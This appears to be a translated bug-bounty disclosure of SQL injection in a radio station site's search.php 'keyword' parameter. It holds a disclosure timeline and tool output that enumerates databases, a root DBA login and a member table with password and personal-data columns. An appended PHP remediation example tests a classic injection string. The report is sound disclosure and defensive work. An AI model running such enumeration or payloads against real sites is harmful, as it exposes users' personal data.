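2015-12-30: Details reported to the vendor; awaiting vendor handling
2015-12-31: Vendor confirmed; details disclosed to the vendor only
2016-01-10: Details disclosed to core white hats and relevant domain experts
2016-01-20: Details disclosed to regular white hats
2016-01-30: Details disclosed to intern white hats
2016-02-12: Details disclosed to the public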
RT
Main site address:
http://**.**.**.**/
Listen online:
http://**.**.**.**/live_goodnews_new.htm
Listening to it, it sounds like big sister Chi-ling talking... so soft...
Vulnerable URL:
http://**.**.**.**/search.php
POST: keyword=1&submit=%E9%80%81%E5%87%BA
Parameter: keyword
Ran it through a tool
5 databases:
available databases [5]:
[*] choir
[*] goodnews
[*] information_schema
[*] mysql
[*] test
Current database information:
current user: 'root@localhost'
current database: 'goodnews'
current user is DBA: True
85 tables:
Database: goodnews
[85 tables]
+--------------------------+
| admins                   |
| admins_log               |
| areacode                 |
| banner                   |
| banner_type              |
| broadcast                |
| broadcast_log            |
| common_label             |
| content                  |
| content_group            |
| content_group_hex        |
| content_keyword          |
| content_log_action       |
| content_log_factory      |
| content_log_library      |
| content_log_message      |
| content_log_music        |
| content_log_musicnews    |
| content_log_news         |
| content_log_program      |
| content_log_publish      |
| content_log_song         |
| content_log_story        |
| content_log_website      |
| content_top              |
| content_type_action      |
| content_type_common      |
| content_type_factory     |
| content_type_host        |
| content_type_magazine    |
| content_type_message     |
| content_type_music       |
| content_type_news        |
| content_type_program     |
| content_type_promotion   |
| content_type_publish     |
| content_type_story       |
| content_type_website     |
| epaper                   |
| epaper_order             |
| epaper_queue             |
| epaper_type              |
| faqs                     |
| faqs_type                |
| forum                    |
| forum_group              |
| forum_group_type         |
| forum_post               |
| forum_post_type          |
| forum_reply              |
| forum_vote               |
| host                     |
| host_log                 |
| library_member           |
| library_member_log       |
| library_music            |
| library_music_borrow     |
| library_music_borrow_log |
| library_music_expand_log |
| library_music_log        |
| library_music_song       |
| library_music_type       |
| live                     |
| marquee                  |
| marquee_log              |
| marquee_type             |
| member                   |
| member_country           |
| member_education         |
| member_identity          |
| member_interest          |
| member_log               |
| member_notice            |
| member_question          |
| member_religion          |
| member_response          |
| member_type              |
| menu_group               |
| repost_type              |
| security_images          |
| website                  |
| website_counter          |
| website_log_ccm          |
| website_log_classic      |
| website_type             |
+--------------------------+
22516 user records:
The member table has 75 columns
Database: goodnews
Table: member
[75 columns]
+--------------------------------+--------------+
| Column                         | Type         |
+--------------------------------+--------------+
| id                             | int(10)      |
| member_account                 | varchar(25)  |
| member_action_notice           | int(5)       |
| member_address                 | varchar(250) |
| member_admin                   | varchar(120) |
| member_admin_update            | datetime     |
| member_answer                  | varchar(120) |
| member_areacode                | varchar(25)  |
| member_birthday                | varchar(25)  |
| member_birthday_month          | varchar(5)   |
| member_counter                 | int(10)      |
| member_country                 | int(5)       |
| member_education               | int(5)       |
| member_email                   | varchar(120) |
| member_emailchk                | int(1)       |
| member_epaper                  | int(1)       |
| member_fax                     | varchar(120) |
| member_flag                    | int(5)       |
| member_id                      | varchar(120) |
| member_identity                | int(5)       |
| member_interest                | int(5)       |
| member_level                   | varchar(25)  |
| member_manage_title            | varchar(120) |
| member_memo                    | text         |
| member_mobeil                  | varchar(120) |
| member_mobeil_country_areacode | varchar(120) |
| member_nickname                | varchar(120) |
| member_note                    | text         |
| member_order_counter           | int(10)      |
| member_order_update            | datetime     |
| member_password                | varchar(25)  |
| member_pincode                 | varchar(25)  |
| member_publish_order_magazine  | int(5)       |
| member_publish_order_paper     | int(5)       |
| member_question                | varchar(25)  |
| member_reg_date                | datetime     |
| member_reg_ip                  | varchar(120) |
| member_religion                | int(5)       |
| member_report_01               | int(5)       |
| member_send_address            | varchar(250) |
| member_send_areacode           | varchar(25)  |
| member_sex                     | int(1)       |
| member_sign                    | varchar(250) |
| member_status                  | int(1)       |
| member_tel                     | varchar(120) |
| member_tel_areacode            | varchar(120) |
| member_tel_country_areacode    | varchar(120) |
| member_title                   | varchar(120) |
| member_type_01                 | int(5)       |
| member_type_02                 | int(5)       |
| member_type_03                 | int(5)       |
| member_type_04                 | int(5)       |
| member_type_05                 | int(5)       |
| member_type_06                 | int(5)       |
| member_type_07                 | int(5)       |
| member_type_08                 | int(5)       |
| member_type_09                 | int(5)       |
| member_type_10                 | int(5)       |
| member_type_11                 | int(5)       |
| member_type_12                 | int(5)       |
| member_type_13                 | int(5)       |
| member_type_14                 | int(5)       |
| member_type_kind               | int(10)      |
| member_unit                    | varchar(250) |
| member_unit_ext                | varchar(25)  |
| member_unit_no                 | varchar(120) |
| member_unit_no_title           | varchar(120) |
| member_unit_tel                | varchar(120) |
| member_update                  | datetime     |
| members_birthday_month         | varchar(5)   |
| members_equip                  | varchar(200) |
| members_face                   | varchar(100) |
| members_face_height            | int(4)       |
| members_face_width             | int(4)       |
| members_useravatar             | varchar(10)  |
+--------------------------------+--------------+
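Dumped a few records as proof
To summarize:
The DBA account can access other databases
Proven
Filter the input
Severity: High
Vulnerability Rank: 17
Confirmed at: 2015-12-31 03:34
Thanks for the report
None yet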
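
The report asks for filtering of the keyword POST parameter on search.php and shows the application connecting as root@localhost. The PHP below is an added example, not code from the affected site: it binds the keyword as a query parameter instead of building SQL from it, and its comments show a non-root connection. The function name search_content(), the id/title columns of the content table, the goodnews_web account and the sample rows are assumptions made for illustration.

```php
<?php
declare(strict_types=1);
// Added example (not the site's code). Hypothetical names: search_content(),
// columns id/title of table "content", the account goodnews_web.

function search_content(PDO $pdo, string $keyword): array
{
    $keyword = trim($keyword);
    // Bound the input before it reaches the database.
    if ($keyword === '' || strlen($keyword) > 128) {
        return [];
    }
    // Escape LIKE wildcards so the keyword is matched literally.
    $pattern = '%' . preg_replace('/[!%_]/', '!$0', $keyword) . '%';
    // The keyword is sent as a bound parameter, never spliced into the SQL text.
    $stmt = $pdo->prepare(
        "SELECT id, title FROM content WHERE title LIKE :kw ESCAPE '!' LIMIT 50"
    );
    $stmt->bindValue(':kw', $pattern, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Demo on constructed data in an in-memory SQLite database so it runs offline.
// Against MySQL, connect with a dedicated non-root account, for example:
//   new PDO('mysql:host=localhost;dbname=goodnews;charset=utf8mb4', 'goodnews_web', $pass,
//           [PDO::ATTR_EMULATE_PREPARES => false]);
//   GRANT SELECT ON goodnews.content TO 'goodnews_web'@'localhost';
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE content (id INTEGER PRIMARY KEY, title TEXT)');
$pdo->exec("INSERT INTO content (title) VALUES ('Morning program'), ('100% live'), ('Evening news')");

// A normal keyword, a bare wildcard, and a keyword containing quotes (constructed inputs).
foreach (['news', '%', "1' OR '1'='1"] as $kw) {
    printf("%-16s => %d row(s)\n", $kw, count(search_content($pdo, $kw)));
}
```

With an account limited to the tables the search needs, an injection flaw elsewhere in the application could no longer reach the mysql, choir or test databases listed above.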